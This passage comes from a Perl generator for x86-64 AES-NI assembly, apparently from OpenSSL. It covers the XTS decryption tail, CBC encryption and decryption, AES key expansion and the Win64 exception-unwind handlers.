pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movups ($inp),$inout0
pand $twmask,$twres # isolate carry and residue
movups 16*1($inp),$inout1
pxor $twres,@tweak[5]
movups 16*2($inp),$inout2
xorps @tweak[0],$inout0
movups 16*3($inp),$inout3
lea 16*4($inp),$inp
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
xorps @tweak[3],$inout3
call _aesni_decrypt4
xorps @tweak[0],$inout0
movdqa @tweak[4],@tweak[0]
xorps @tweak[1],$inout1
movdqa @tweak[5],@tweak[1]
xorps @tweak[2],$inout2
movups $inout0,($out)
xorps @tweak[3],$inout3
movups $inout1,16*1($out)
movups $inout2,16*2($out)
movups $inout3,16*3($out)
lea 16*4($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_done:
and \$15,$len_
jz .Lxts_dec_ret
.Lxts_dec_done2:
mov $len_,$len
mov $key_,$key # restore $key
mov $rnds_,$rounds # restore $rounds
movups ($inp),$inout0
xorps @tweak[1],$inout0
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps @tweak[1],$inout0
movups $inout0,($out)
.Lxts_dec_steal:
movzb 16($inp),%eax # borrow $rounds ...
movzb ($out),%ecx # ... and $key
lea 1($inp),$inp
mov %al,($out)
mov %cl,16($out)
lea 1($out),$out
sub \$1,$len
jnz .Lxts_dec_steal
sub $len_,$out # rewind $out
mov $key_,$key # restore $key
mov $rnds_,$rounds # restore $rounds
movups ($out),$inout0
xorps @tweak[0],$inout0
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movups $inout0,($out)
.Lxts_dec_ret:
___
$code.=<<___ if ($win64);
movaps 0x60(%rsp),%xmm6
movaps 0x70(%rsp),%xmm7
movaps 0x80(%rsp),%xmm8
movaps 0x90(%rsp),%xmm9
movaps 0xa0(%rsp),%xmm10
movaps 0xb0(%rsp),%xmm11
movaps 0xc0(%rsp),%xmm12
movaps 0xd0(%rsp),%xmm13
movaps 0xe0(%rsp),%xmm14
movaps 0xf0(%rsp),%xmm15
___
$code.=<<___;
lea $frame_size(%rsp),%rsp
.Lxts_dec_epilogue:
ret
.size aesni_xts_decrypt,.-aesni_xts_decrypt
___
} }}
########################################################################
# void $PREFIX_cbc_encrypt (const void *inp, void *out,
# size_t length, const AES_KEY *key,
# unsigned char *ivp,const int enc);
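# Note: the 6th argument selects the direction. CBC encryption is
# inherently serial (each block depends on the previous ciphertext), so it
# is processed one block at a time; CBC decryption has no such dependency
# and is handled up to eight blocks at a time below.
#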
{
my $reserved = $win64?0x40:-0x18; # used in decrypt
$code.=<<___;
.globl ${PREFIX}_cbc_encrypt
.type ${PREFIX}_cbc_encrypt,\@function,6
.align 16
${PREFIX}_cbc_encrypt:
test $len,$len # check length
jz .Lcbc_ret
mov 240($key),$rnds_ # key->rounds
mov $key,$key_ # backup $key
test %r9d,%r9d # 6th argument
jz .Lcbc_decrypt
#--------------------------- CBC ENCRYPT ------------------------------#
movups ($ivp),$inout0 # load iv as initial state
mov $rnds_,$rounds
cmp \$16,$len
jb .Lcbc_enc_tail
sub \$16,$len
jmp .Lcbc_enc_loop
.align 16
.Lcbc_enc_loop:
movups ($inp),$inout1 # load input
lea 16($inp),$inp
#xorps $inout1,$inout0
___
&aesni_generate1("enc",$key,$rounds,$inout0,$inout1);
$code.=<<___;
mov $rnds_,$rounds # restore $rounds
mov $key_,$key # restore $key
movups $inout0,0($out) # store output
lea 16($out),$out
sub \$16,$len
jnc .Lcbc_enc_loop
add \$16,$len
jnz .Lcbc_enc_tail
movups $inout0,($ivp)
jmp .Lcbc_ret
.Lcbc_enc_tail:
mov $len,%rcx # zaps $key
xchg $inp,$out # $inp is %rsi and $out is %rdi now
.long 0x9066A4F3 # rep movsb
mov \$16,%ecx # zero tail
sub $len,%rcx
xor %eax,%eax
.long 0x9066AAF3 # rep stosb
lea -16(%rdi),%rdi # rewind $out by 1 block
mov $rnds_,$rounds # restore $rounds
mov %rdi,%rsi # $inp and $out are the same
mov $key_,$key # restore $key
xor $len,$len # len=16
jmp .Lcbc_enc_loop # one more spin
#--------------------------- CBC DECRYPT ------------------------------#
.align 16
.Lcbc_decrypt:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lcbc_decrypt_body:
___
$code.=<<___;
movups ($ivp),$iv
mov $rnds_,$rounds
cmp \$0x70,$len
jbe .Lcbc_dec_tail
shr \$1,$rnds_
sub \$0x70,$len
mov $rnds_,$rounds
movaps $iv,$reserved(%rsp)
jmp .Lcbc_dec_loop8_enter
.align 16
.Lcbc_dec_loop8:
movaps $rndkey0,$reserved(%rsp) # save IV
movups $inout7,($out)
lea 0x10($out),$out
.Lcbc_dec_loop8_enter:
$movkey ($key),$rndkey0
movups ($inp),$inout0 # load input
movups 0x10($inp),$inout1
$movkey 16($key),$rndkey1
lea 32($key),$key
movdqu 0x20($inp),$inout2
xorps $rndkey0,$inout0
movdqu 0x30($inp),$inout3
xorps $rndkey0,$inout1
movdqu 0x40($inp),$inout4
aesdec $rndkey1,$inout0
pxor $rndkey0,$inout2
movdqu 0x50($inp),$inout5
aesdec $rndkey1,$inout1
pxor $rndkey0,$inout3
movdqu 0x60($inp),$inout6
aesdec $rndkey1,$inout2
pxor $rndkey0,$inout4
movdqu 0x70($inp),$inout7
aesdec $rndkey1,$inout3
pxor $rndkey0,$inout5
dec $rounds
aesdec $rndkey1,$inout4
pxor $rndkey0,$inout6
aesdec $rndkey1,$inout5
pxor $rndkey0,$inout7
$movkey ($key),$rndkey0
aesdec $rndkey1,$inout6
aesdec $rndkey1,$inout7
$movkey 16($key),$rndkey1
call .Ldec_loop8_enter
movups ($inp),$rndkey1 # re-load input
movups 0x10($inp),$rndkey0
xorps $reserved(%rsp),$inout0 # ^= IV
xorps $rndkey1,$inout1
movups 0x20($inp),$rndkey1
xorps $rndkey0,$inout2
movups 0x30($inp),$rndkey0
xorps $rndkey1,$inout3
movups 0x40($inp),$rndkey1
xorps $rndkey0,$inout4
movups 0x50($inp),$rndkey0
xorps $rndkey1,$inout5
movups 0x60($inp),$rndkey1
xorps $rndkey0,$inout6
movups 0x70($inp),$rndkey0 # IV
xorps $rndkey1,$inout7
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
mov $rnds_,$rounds # restore $rounds
movups $inout4,0x40($out)
mov $key_,$key # restore $key
movups $inout5,0x50($out)
lea 0x80($inp),$inp
movups $inout6,0x60($out)
lea 0x70($out),$out
sub \$0x80,$len
ja .Lcbc_dec_loop8
movaps $inout7,$inout0
movaps $rndkey0,$iv
add \$0x70,$len
jle .Lcbc_dec_tail_collected
movups $inout0,($out)
lea 1($rnds_,$rnds_),$rounds
lea 0x10($out),$out
.Lcbc_dec_tail:
movups ($inp),$inout0
movaps $inout0,$in0
cmp \$0x10,$len
jbe .Lcbc_dec_one
movups 0x10($inp),$inout1
movaps $inout1,$in1
cmp \$0x20,$len
jbe .Lcbc_dec_two
movups 0x20($inp),$inout2
movaps $inout2,$in2
cmp \$0x30,$len
jbe .Lcbc_dec_three
movups 0x30($inp),$inout3
cmp \$0x40,$len
jbe .Lcbc_dec_four
movups 0x40($inp),$inout4
cmp \$0x50,$len
jbe .Lcbc_dec_five
movups 0x50($inp),$inout5
cmp \$0x60,$len
jbe .Lcbc_dec_six
movups 0x60($inp),$inout6
movaps $iv,$reserved(%rsp) # save IV
call _aesni_decrypt8
movups ($inp),$rndkey1
movups 0x10($inp),$rndkey0
xorps $reserved(%rsp),$inout0 # ^= IV
xorps $rndkey1,$inout1
movups 0x20($inp),$rndkey1
xorps $rndkey0,$inout2
movups 0x30($inp),$rndkey0
xorps $rndkey1,$inout3
movups 0x40($inp),$rndkey1
xorps $rndkey0,$inout4
movups 0x50($inp),$rndkey0
xorps $rndkey1,$inout5
movups 0x60($inp),$iv # IV
xorps $rndkey0,$inout6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
lea 0x60($out),$out
movaps $inout6,$inout0
sub \$0x70,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_one:
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps $iv,$inout0
movaps $in0,$iv
sub \$0x10,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_two:
xorps $inout2,$inout2
call _aesni_decrypt3
xorps $iv,$inout0
xorps $in0,$inout1
movups $inout0,($out)
movaps $in1,$iv
movaps $inout1,$inout0
lea 0x10($out),$out
sub \$0x20,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_three:
call _aesni_decrypt3
xorps $iv,$inout0
xorps $in0,$inout1
movups $inout0,($out)
xorps $in1,$inout2
movups $inout1,0x10($out)
movaps $in2,$iv
movaps $inout2,$inout0
lea 0x20($out),$out
sub \$0x30,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_four:
call _aesni_decrypt4
xorps $iv,$inout0
movups 0x30($inp),$iv
xorps $in0,$inout1
movups $inout0,($out)
xorps $in1,$inout2
movups $inout1,0x10($out)
xorps $in2,$inout3
movups $inout2,0x20($out)
movaps $inout3,$inout0
lea 0x30($out),$out
sub \$0x40,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_five:
xorps $inout5,$inout5
call _aesni_decrypt6
movups 0x10($inp),$rndkey1
movups 0x20($inp),$rndkey0
xorps $iv,$inout0
xorps $in0,$inout1
xorps $rndkey1,$inout2
movups 0x30($inp),$rndkey1
xorps $rndkey0,$inout3
movups 0x40($inp),$iv
xorps $rndkey1,$inout4
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
lea 0x40($out),$out
movaps $inout4,$inout0
sub \$0x50,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_six:
call _aesni_decrypt6
movups 0x10($inp),$rndkey1
movups 0x20($inp),$rndkey0
xorps $iv,$inout0
xorps $in0,$inout1
xorps $rndkey1,$inout2
movups 0x30($inp),$rndkey1
xorps $rndkey0,$inout3
movups 0x40($inp),$rndkey0
xorps $rndkey1,$inout4
movups 0x50($inp),$iv
xorps $rndkey0,$inout5
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
lea 0x50($out),$out
movaps $inout5,$inout0
sub \$0x60,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_tail_collected:
and \$15,$len
movups $iv,($ivp)
jnz .Lcbc_dec_tail_partial
movups $inout0,($out)
jmp .Lcbc_dec_ret
.align 16
.Lcbc_dec_tail_partial:
movaps $inout0,$reserved(%rsp)
mov \$16,%rcx
mov $out,%rdi
sub $len,%rcx
lea $reserved(%rsp),%rsi
.long 0x9066A4F3 # rep movsb
.Lcbc_dec_ret:
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
___
$code.=<<___;
.Lcbc_ret:
ret
.size ${PREFIX}_cbc_encrypt,.-${PREFIX}_cbc_encrypt
___
}
# int $PREFIX_set_[en|de]crypt_key (const unsigned char *userKey,
# int bits, AES_KEY *key)
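# Note: ${PREFIX}_set_decrypt_key derives the decryption schedule by first
# running the encryption key expansion, then reversing the order of the
# round keys and applying aesimc (InvMixColumns) to every round key except
# the first and last, i.e. the "equivalent inverse cipher" layout expected
# by aesdec/aesdeclast.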
{ my ($inp,$bits,$key) = @_4args;
$bits =~ s/%r/%e/;
$code.=<<___;
.globl ${PREFIX}_set_decrypt_key
.type ${PREFIX}_set_decrypt_key,\@abi-omnipotent
.align 16
${PREFIX}_set_decrypt_key:
.byte 0x48,0x83,0xEC,0x08 # sub rsp,8
call __aesni_set_encrypt_key
shl \$4,$bits # rounds-1 after _aesni_set_encrypt_key
test %eax,%eax
jnz .Ldec_key_ret
lea 16($key,$bits),$inp # points at the end of key schedule
$movkey ($key),%xmm0 # just swap
$movkey ($inp),%xmm1
$movkey %xmm0,($inp)
$movkey %xmm1,($key)
lea 16($key),$key
lea -16($inp),$inp
.Ldec_key_inverse:
$movkey ($key),%xmm0 # swap and inverse
$movkey ($inp),%xmm1
aesimc %xmm0,%xmm0
aesimc %xmm1,%xmm1
lea 16($key),$key
lea -16($inp),$inp
$movkey %xmm0,16($inp)
$movkey %xmm1,-16($key)
cmp $key,$inp
ja .Ldec_key_inverse
$movkey ($key),%xmm0 # inverse middle
aesimc %xmm0,%xmm0
$movkey %xmm0,($inp)
.Ldec_key_ret:
add \$8,%rsp
ret
.LSEH_end_set_decrypt_key:
.size ${PREFIX}_set_decrypt_key,.-${PREFIX}_set_decrypt_key
___
# This is based on submission by
#
# Huang Ying <[email protected]>
# Vinodh Gopal <[email protected]>
# Kahraman Akdemir
#
# Aggressively optimized with respect to aeskeygenassist's critical path;
# the key-schedule state is kept in %xmm0-5 to meet the Win64 ABI requirement.
#
$code.=<<___;
.globl ${PREFIX}_set_encrypt_key
.type ${PREFIX}_set_encrypt_key,\@abi-omnipotent
.align 16
${PREFIX}_set_encrypt_key:
__aesni_set_encrypt_key:
.byte 0x48,0x83,0xEC,0x08 # sub rsp,8
mov \$-1,%rax
test $inp,$inp
jz .Lenc_key_ret
test $key,$key
jz .Lenc_key_ret
movups ($inp),%xmm0 # pull first 128 bits of *userKey
xorps %xmm4,%xmm4 # low dword of xmm4 is assumed 0
lea 16($key),%rax
cmp \$256,$bits
je .L14rounds
cmp \$192,$bits
je .L12rounds
cmp \$128,$bits
jne .Lbad_keybits
.L10rounds:
mov \$9,$bits # 10 rounds for 128-bit key
$movkey %xmm0,($key) # round 0
aeskeygenassist \$0x1,%xmm0,%xmm1 # round 1
call .Lkey_expansion_128_cold
aeskeygenassist \$0x2,%xmm0,%xmm1 # round 2
call .Lkey_expansion_128
aeskeygenassist \$0x4,%xmm0,%xmm1 # round 3
call .Lkey_expansion_128
aeskeygenassist \$0x8,%xmm0,%xmm1 # round 4
call .Lkey_expansion_128
aeskeygenassist \$0x10,%xmm0,%xmm1 # round 5
call .Lkey_expansion_128
aeskeygenassist \$0x20,%xmm0,%xmm1 # round 6
call .Lkey_expansion_128
aeskeygenassist \$0x40,%xmm0,%xmm1 # round 7
call .Lkey_expansion_128
aeskeygenassist \$0x80,%xmm0,%xmm1 # round 8
call .Lkey_expansion_128
aeskeygenassist \$0x1b,%xmm0,%xmm1 # round 9
call .Lkey_expansion_128
aeskeygenassist \$0x36,%xmm0,%xmm1 # round 10
call .Lkey_expansion_128
$movkey %xmm0,(%rax)
mov $bits,80(%rax) # 240(%rdx)
xor %eax,%eax
jmp .Lenc_key_ret
.align 16
.L12rounds:
movq 16($inp),%xmm2 # remaining 1/3 of *userKey
mov \$11,$bits # 12 rounds for 192
$movkey %xmm0,($key) # round 0
aeskeygenassist \$0x1,%xmm2,%xmm1 # round 1,2
call .Lkey_expansion_192a_cold
aeskeygenassist \$0x2,%xmm2,%xmm1 # round 2,3
call .Lkey_expansion_192b
aeskeygenassist \$0x4,%xmm2,%xmm1 # round 4,5
call .Lkey_expansion_192a
aeskeygenassist \$0x8,%xmm2,%xmm1 # round 5,6
call .Lkey_expansion_192b
aeskeygenassist \$0x10,%xmm2,%xmm1 # round 7,8
call .Lkey_expansion_192a
aeskeygenassist \$0x20,%xmm2,%xmm1 # round 8,9
call .Lkey_expansion_192b
aeskeygenassist \$0x40,%xmm2,%xmm1 # round 10,11
call .Lkey_expansion_192a
aeskeygenassist \$0x80,%xmm2,%xmm1 # round 11,12
call .Lkey_expansion_192b
$movkey %xmm0,(%rax)
mov $bits,48(%rax) # 240(%rdx)
xor %rax, %rax
jmp .Lenc_key_ret
.align 16
.L14rounds:
	movups	16($inp),%xmm2			# remaining half of *userKey
mov \$13,$bits # 14 rounds for 256
lea 16(%rax),%rax
$movkey %xmm0,($key) # round 0
$movkey %xmm2,16($key) # round 1
aeskeygenassist \$0x1,%xmm2,%xmm1 # round 2
call .Lkey_expansion_256a_cold
aeskeygenassist \$0x1,%xmm0,%xmm1 # round 3
call .Lkey_expansion_256b
aeskeygenassist \$0x2,%xmm2,%xmm1 # round 4
call .Lkey_expansion_256a
aeskeygenassist \$0x2,%xmm0,%xmm1 # round 5
call .Lkey_expansion_256b
aeskeygenassist \$0x4,%xmm2,%xmm1 # round 6
call .Lkey_expansion_256a
aeskeygenassist \$0x4,%xmm0,%xmm1 # round 7
call .Lkey_expansion_256b
aeskeygenassist \$0x8,%xmm2,%xmm1 # round 8
call .Lkey_expansion_256a
aeskeygenassist \$0x8,%xmm0,%xmm1 # round 9
call .Lkey_expansion_256b
aeskeygenassist \$0x10,%xmm2,%xmm1 # round 10
call .Lkey_expansion_256a
aeskeygenassist \$0x10,%xmm0,%xmm1 # round 11
call .Lkey_expansion_256b
aeskeygenassist \$0x20,%xmm2,%xmm1 # round 12
call .Lkey_expansion_256a
aeskeygenassist \$0x20,%xmm0,%xmm1 # round 13
call .Lkey_expansion_256b
aeskeygenassist \$0x40,%xmm2,%xmm1 # round 14
call .Lkey_expansion_256a
$movkey %xmm0,(%rax)
mov $bits,16(%rax) # 240(%rdx)
xor %rax,%rax
jmp .Lenc_key_ret
.align 16
.Lbad_keybits:
mov \$-2,%rax
.Lenc_key_ret:
add \$8,%rsp
ret
.LSEH_end_set_encrypt_key:
.align 16
.Lkey_expansion_128:
$movkey %xmm0,(%rax)
lea 16(%rax),%rax
.Lkey_expansion_128_cold:
shufps \$0b00010000,%xmm0,%xmm4
xorps %xmm4, %xmm0
shufps \$0b10001100,%xmm0,%xmm4
xorps %xmm4, %xmm0
shufps \$0b11111111,%xmm1,%xmm1 # critical path
xorps %xmm1,%xmm0
ret
.align 16
.Lkey_expansion_192a:
$movkey %xmm0,(%rax)
lea 16(%rax),%rax
.Lkey_expansion_192a_cold:
movaps %xmm2, %xmm5
.Lkey_expansion_192b_warm:
shufps \$0b00010000,%xmm0,%xmm4
movdqa %xmm2,%xmm3
xorps %xmm4,%xmm0
shufps \$0b10001100,%xmm0,%xmm4
pslldq \$4,%xmm3
xorps %xmm4,%xmm0
pshufd \$0b01010101,%xmm1,%xmm1 # critical path
pxor %xmm3,%xmm2
pxor %xmm1,%xmm0
pshufd \$0b11111111,%xmm0,%xmm3
pxor %xmm3,%xmm2
ret
.align 16
.Lkey_expansion_192b:
movaps %xmm0,%xmm3
shufps \$0b01000100,%xmm0,%xmm5
$movkey %xmm5,(%rax)
shufps \$0b01001110,%xmm2,%xmm3
$movkey %xmm3,16(%rax)
lea 32(%rax),%rax
jmp .Lkey_expansion_192b_warm
.align 16
.Lkey_expansion_256a:
$movkey %xmm2,(%rax)
lea 16(%rax),%rax
.Lkey_expansion_256a_cold:
shufps \$0b00010000,%xmm0,%xmm4
xorps %xmm4,%xmm0
shufps \$0b10001100,%xmm0,%xmm4
xorps %xmm4,%xmm0
shufps \$0b11111111,%xmm1,%xmm1 # critical path
xorps %xmm1,%xmm0
ret
.align 16
.Lkey_expansion_256b:
$movkey %xmm0,(%rax)
lea 16(%rax),%rax
shufps \$0b00010000,%xmm2,%xmm4
xorps %xmm4,%xmm2
shufps \$0b10001100,%xmm2,%xmm4
xorps %xmm4,%xmm2
shufps \$0b10101010,%xmm1,%xmm1 # critical path
xorps %xmm1,%xmm2
ret
.size ${PREFIX}_set_encrypt_key,.-${PREFIX}_set_encrypt_key
.size __aesni_set_encrypt_key,.-__aesni_set_encrypt_key
___
}
$code.=<<___;
.align 64
.Lbswap_mask:
.byte 15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0
.Lincrement32:
.long 6,6,6,0
.Lincrement64:
.long 1,0,0,0
.Lxts_magic:
.long 0x87,0,1,0
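# .Lxts_magic encodes the carry pattern for doubling the XTS tweak in
# GF(2^128): 0x87 folds the carry out of bit 127 back into the low byte,
# and the 1 in the third dword propagates the carry between the two
# 64-bit halves. .Lincrement32 adds 6 to each of the three counter lanes
# per iteration of the CTR loop above.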
.asciz "AES for Intel AES-NI, CRYPTOGAMS by <appro\@openssl.org>"
.align 64
___
# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
# CONTEXT *context,DISPATCHER_CONTEXT *disp)
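# These handlers exist purely for Win64 structured exception handling: when
# an exception unwinds through one of the assembly routines, they copy the
# non-volatile XMM registers saved in that routine's prologue back into the
# CONTEXT record, recover the original stack pointer and %rsi/%rdi, and then
# chain to RtlVirtualUnwind.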
if ($win64) {
$rec="%rcx";
$frame="%rdx";
$context="%r8";
$disp="%r9";
$code.=<<___;
.extern __imp_RtlVirtualUnwind
___
$code.=<<___ if ($PREFIX eq "aesni");
.type ecb_ccm64_se_handler,\@abi-omnipotent
.align 16
ecb_ccm64_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
mov 8($disp),%rsi # disp->ImageBase
mov 56($disp),%r11 # disp->HandlerData
mov 0(%r11),%r10d # HandlerData[0]
lea (%rsi,%r10),%r10 # prologue label
cmp %r10,%rbx # context->Rip<prologue label
jb .Lcommon_seh_tail
mov 152($context),%rax # pull context->Rsp
mov 4(%r11),%r10d # HandlerData[1]
lea (%rsi,%r10),%r10 # epilogue label
cmp %r10,%rbx # context->Rip>=epilogue label
jae .Lcommon_seh_tail
lea 0(%rax),%rsi # %xmm save area
lea 512($context),%rdi # &context.Xmm6
mov \$8,%ecx # 4*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0x58(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.size ecb_ccm64_se_handler,.-ecb_ccm64_se_handler
.type ctr32_se_handler,\@abi-omnipotent
.align 16
ctr32_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
lea .Lctr32_body(%rip),%r10
cmp %r10,%rbx # context->Rip<"prologue" label
jb .Lcommon_seh_tail
mov 152($context),%rax # pull context->Rsp
lea .Lctr32_ret(%rip),%r10
cmp %r10,%rbx
jae .Lcommon_seh_tail
lea 0x20(%rax),%rsi # %xmm save area
lea 512($context),%rdi # &context.Xmm6
mov \$20,%ecx # 10*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0xc8(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.size ctr32_se_handler,.-ctr32_se_handler
.type xts_se_handler,\@abi-omnipotent
.align 16
xts_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
mov 8($disp),%rsi # disp->ImageBase
mov 56($disp),%r11 # disp->HandlerData
mov 0(%r11),%r10d # HandlerData[0]
	lea	(%rsi,%r10),%r10		# prologue label
cmp %r10,%rbx # context->Rip<prologue label
jb .Lcommon_seh_tail
mov 152($context),%rax # pull context->Rsp
mov 4(%r11),%r10d # HandlerData[1]
lea (%rsi,%r10),%r10 # epilogue label
cmp %r10,%rbx # context->Rip>=epilogue label
jae .Lcommon_seh_tail
lea 0x60(%rax),%rsi # %xmm save area
	lea	512($context),%rdi		# &context.Xmm6
mov \$20,%ecx # 10*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0x68+160(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.size xts_se_handler,.-xts_se_handler
___
$code.=<<___;
.type cbc_se_handler,\@abi-omnipotent
.align 16
cbc_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 152($context),%rax # pull context->Rsp
mov 248($context),%rbx # pull context->Rip
lea .Lcbc_decrypt(%rip),%r10
cmp %r10,%rbx # context->Rip<"prologue" label
jb .Lcommon_seh_tail
lea .Lcbc_decrypt_body(%rip),%r10
cmp %r10,%rbx # context->Rip<cbc_decrypt_body
jb .Lrestore_cbc_rax
lea .Lcbc_ret(%rip),%r10
cmp %r10,%rbx # context->Rip>="epilogue" label
jae .Lcommon_seh_tail
lea 0(%rax),%rsi # top of stack
lea 512($context),%rdi # &context.Xmm6
mov \$8,%ecx # 4*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0x58(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.Lrestore_cbc_rax:
mov 120($context),%rax
.Lcommon_seh_tail:
mov 8(%rax),%rdi
mov 16(%rax),%rsi
mov %rax,152($context) # restore context->Rsp
mov %rsi,168($context) # restore context->Rsi
mov %rdi,176($context) # restore context->Rdi
mov 40($disp),%rdi # disp->ContextRecord
mov $context,%rsi # context
mov \$154,%ecx # sizeof(CONTEXT)
.long 0xa548f3fc # cld; rep movsq
mov $disp,%rsi
xor %rcx,%rcx # arg1, UNW_FLAG_NHANDLER
mov 8(%rsi),%rdx # arg2, disp->ImageBase
mov 0(%rsi),%r8 # arg3, disp->ControlPc
mov 16(%rsi),%r9 # arg4, disp->FunctionEntry
mov 40(%rsi),%r10 # disp->ContextRecord
lea 56(%rsi),%r11 # &disp->HandlerData
lea 24(%rsi),%r12 # &disp->EstablisherFrame
mov %r10,32(%rsp) # arg5
mov %r11,40(%rsp) # arg6
mov %r12,48(%rsp) # arg7
mov %rcx,56(%rsp) # arg8, (NULL)
call *__imp_RtlVirtualUnwind(%rip)
mov \$1,%eax # ExceptionContinueSearch
add \$64,%rsp
popfq
pop %r15
pop %r14
pop %r13
pop %r12
pop %rbp
pop %rbx
pop %rdi
pop %rsi
ret
.size cbc_se_handler,.-cbc_se_handler
.section .pdata
.align 4
___
$code.=<<___ if ($PREFIX eq "aesni");
.rva .LSEH_begin_aesni_ecb_encrypt
.rva .LSEH_end_aesni_ecb_encrypt
.rva .LSEH_info_ecb
.rva .LSEH_begin_aesni_ccm64_encrypt_blocks
.rva .LSEH_end_aesni_ccm64_encrypt_blocks
.rva .LSEH_info_ccm64_enc
.rva .LSEH_begin_aesni_ccm64_decrypt_blocks
.rva .LSEH_end_aesni_ccm64_decrypt_blocks
.rva .LSEH_info_ccm64_dec
.rva .LSEH_begin_aesni_ctr32_encrypt_blocks
.rva .LSEH_end_aesni_ctr32_encrypt_blocks
.rva .LSEH_info_ctr32
.rva .LSEH_begin_aesni_xts_encrypt
.rva .LSEH_end_aesni_xts_encrypt
.rva .LSEH_info_xts_enc
.rva .LSEH_begin_aesni_xts_decrypt
.rva .LSEH_end_aesni_xts_decrypt
.rva .LSEH_info_xts_dec
___
$code.=<<___;
.rva .LSEH_begin_${PREFIX}_cbc_encrypt
.rva .LSEH_end_${PREFIX}_cbc_encrypt
.rva .LSEH_info_cbc
.rva ${PREFIX}_set_decrypt_key
.rva .LSEH_end_set_decrypt_key
.rva .LSEH_info_key
.rva ${PREFIX}_set_encrypt_key
.rva .LSEH_end_set_encrypt_key
.rva .LSEH_info_key
.section .xdata
.align 8
___
$code.=<<___ if ($PREFIX eq "aesni");
.LSEH_info_ecb:
.byte 9,0,0,0
.rva ecb_ccm64_se_handler
.rva .Lecb_enc_body,.Lecb_enc_ret # HandlerData[]
.LSEH_info_ccm64_enc:
.byte 9,0,0,0
.rva ecb_ccm64_se_handler
.rva .Lccm64_enc_body,.Lccm64_enc_ret # HandlerData[]
.LSEH_info_ccm64_dec:
.byte 9,0,0,0
.rva ecb_ccm64_se_handler
.rva .Lccm64_dec_body,.Lccm64_dec_ret # HandlerData[]
.LSEH_info_ctr32:
.byte 9,0,0,0
.rva ctr32_se_handler
.LSEH_info_xts_enc:
.byte 9,0,0,0
.rva xts_se_handler
.rva .Lxts_enc_body,.Lxts_enc_epilogue # HandlerData[]
.LSEH_info_xts_dec:
.byte 9,0,0,0
.rva xts_se_handler
.rva .Lxts_dec_body,.Lxts_dec_epilogue # HandlerData[]
___
$code.=<<___;
.LSEH_info_cbc:
.byte 9,0,0,0
.rva cbc_se_handler
.LSEH_info_key:
.byte 0x01,0x04,0x01,0x00
.byte 0x04,0x02,0x00,0x00 # sub rsp,8
___
}
sub rex {
local *opcode=shift;
my ($dst,$src)=@_;
my $rex=0;
$rex|=0x04 if($dst>=8);
$rex|=0x01 if($src>=8);
push @opcode,$rex|0x40 if($rex);
}
sub aesni {
my $line=shift;
my @opcode=(0x66);
if ($line=~/(aeskeygenassist)\s+\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
rex(\@opcode,$4,$3);
push @opcode,0x0f,0x3a,0xdf;
push @opcode,0xc0|($3&7)|(($4&7)<<3); # ModR/M
my $c=$2;
push @opcode,$c=~/^0/?oct($c):$c;
return ".byte\t".join(',',@opcode);
}
elsif ($line=~/(aes[a-z]+)\s+%xmm([0-9]+),\s*%xmm([0-9]+)/) {
my %opcodelet = (
"aesimc" => 0xdb,
"aesenc" => 0xdc, "aesenclast" => 0xdd,
"aesdec" => 0xde, "aesdeclast" => 0xdf
);
return undef if (!defined($opcodelet{$1}));
rex(\@opcode,$3,$2);
push @opcode,0x0f,0x38,$opcodelet{$1};
